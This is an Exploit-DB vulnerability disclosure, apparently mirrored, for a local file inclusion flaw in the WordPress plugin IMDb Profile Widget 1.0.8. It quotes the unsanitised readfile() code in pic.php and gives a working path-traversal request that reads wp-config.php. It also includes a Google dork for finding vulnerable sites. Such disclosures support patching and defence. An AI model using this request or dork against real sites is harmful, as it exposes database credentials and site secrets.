WordPress Plugin IMDb Profile Widget 1.0.8 – Local File Inclusion

  • 作者: CrashBandicot
    日期: 2016-03-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39621/
  • # Exploit Title: WordPress Plugin IMDb Profile Widget - Local File Inclusion
    # Exploit Author: CrashBandicot @DosPerl
    # Date: 2016-03-26
    # Google Dork : inurl:/wp-content/plugins/imdb-widget
    # Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
    # Tested on: MSWin32
    # Version: 1.0.8
    
    # Vuln file : pic.php
    
    <?php
    
    header( 'Content-Type: image/jpeg' );
    readfile( $_GET["url"] );
    
    
    # PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
    # Right click -> Save As -> rename pic.jpg in .txt and read file
    
    # 26/03/2016 - Informed Vendor about Issue
    # 27/03/2016 - Waiting Reply